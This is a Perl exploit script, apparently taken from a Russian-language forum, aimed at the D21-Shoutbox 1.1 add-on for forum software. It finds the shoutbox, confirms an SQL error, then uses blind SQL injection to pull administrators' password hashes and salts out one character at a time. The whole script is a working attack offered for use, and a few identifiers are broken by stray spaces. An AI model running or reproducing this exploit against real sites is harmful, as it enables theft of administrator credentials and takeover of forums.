#!/usr/bin/perl
########################################
# Coded by k1b0rg (768620) #
# shout.pl <site> <id> #
# shout.pl http://site.ru/forum/ 1 #
# shout.pl http://site.ru/forum/ 1,2 #
########################################
use LWP::UserAgent;
my $browser = LWP::UserAgent->new();
$site=$ARGV[0];
my $admins_id=$ARGV[1];
@admin=split(',',$admins_id);
my $res=$browser->get($site.'index.php?act=Shoutbox');
if($res->content=~/act=Shoutbox&shout=(\d+)/is)
{
my $idshout=$1;
syswrite STDOUT, "\n".'Shout box found!';
my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshou t.'\'');
if($res->content =~ /(SQL error|mySQL query error)/is)
{
syswrite STDOUT, "\n".'Mode(sql) shoutbox: [OK]';
if($res->content =~ /FROM (.*?)shoutbox/i)
{
$prefix_bd=$1;
syswrite STDOUT, "\n".'prefix_bd_shoutbox: ['.$prefix_bd.']';
&shout_sql($idshout);
}
}
else { syswrite STDOUT, "\n".'NOT Vulnerebility';}
}
else { syswrite STDOUT, "\n".'Shout box mode NOT FOUND!';}
sub shout_sql($)
{
my $idshout=$_[0];
foreach my $id(@admin)
{
syswrite STDOUT, "\n".'Admin id ('.$id.') : [';
for($i=1;$i<=32;$i++)
{
&position_shout(97,102,$i,$id,$idshout,'pass') if (!&position_shout(48,57,$i,$id,$idshout,'pass'))
}
syswrite STDOUT, ':';
for($i=1;$i<=5;$i++)
{
&position_shout(33,126,$i,$id,$idshout,'salt');
}
syswrite STDOUT, ']';
}
}
sub position_shout($$$$$$)
{
my ($j,$max,$i,$mid,$idshout,$label)=@_;
while($j<=$max)
{
if(&scan_shout($site,$j,$mid,$i,$idshout,$label)) { syswrite STDOUT, chr($j); return 1;}
$j++;
}
}
sub scan_shout($$$$$)
{
my ($site,$num,$mid,$pos,$idshout,$label)=@_;
my $field=($label eq 'pass')?('converge_pass_hash')
'converge_pass_sal t');
my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshou t.'+and(ascii(substring((select+'.$field.'+from+'. $prefix_bd.'members_converge+where+converge_id='.$ mid.'),'.$pos.',1))='.$num.')/*');
return 1 if($res->content=~/var\ssids\s=\s\[(\d+)\];/is);
}
D21-Shoutbox 1.1
Похожие темы
Древовидный вид